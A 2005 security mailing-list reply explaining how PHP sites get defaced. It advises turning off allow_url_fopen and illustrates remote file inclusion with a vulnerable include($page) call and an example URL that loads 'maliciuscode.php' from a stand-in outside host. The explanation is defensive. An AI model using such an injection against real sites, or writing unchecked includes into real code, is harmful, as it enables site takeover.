Re: How webpage defacement possible just using web hacking?

[Eduardo Kienetz <eduardok () gmail com>]

allow_url_fopen should be set to off in your php.ini
That allows the possibility of exploiting PHP web applications that
were not properly written.
Example:
http://www.blabla.com/t.php?page=/comments.php
At the code we suppose:
include($page);
If url_fopen is allowed (and $page is not properly checked) I could just try: 
http://www.blabla.com/t.php?page=http://www.bbazdfq.com/maliciuscode.php

Usually the extension is even of an image, but with php code in it.

Regards,

Eduardo Bacchi Kienetz
LPI level 1 Certified

On Wed, 09 Mar 2005 00:55:50 +0000, Monty Ree <chulmin2 () hotmail com> wrote:
> Hello, all.
>
> Some days ago, a site is defacemented by web hacking.
> I guess that some attacker gained web server permission using web
> application vuln. and changed index file.
> Surely, the attacker did gain just nobody privilege(web server user) not
> root privilege
> and the index file permission is 644 with other user owned.(and there is no
> write permission at directory)
>
> I guess that it is impossible to change index file just nobody privilege.
> But most webpage defacement is occured using web application vuln. by php
> or cgi something like that.
>
> Of course, it will be possible that vulnerable cgi is set suid. but most is
> not.
>
> Any idea?
>
> Thanks in advance.
>
> _________________________________________________________________
> 고.. 감.. 도.. 사.. 랑.. 만.. 들.. 기.. MSN 러브
> http://www.msn.co.kr/love/


-- 
Eduardo  Bacchi Kienetz
http://www.noticiaslinux.com.br/eduardo/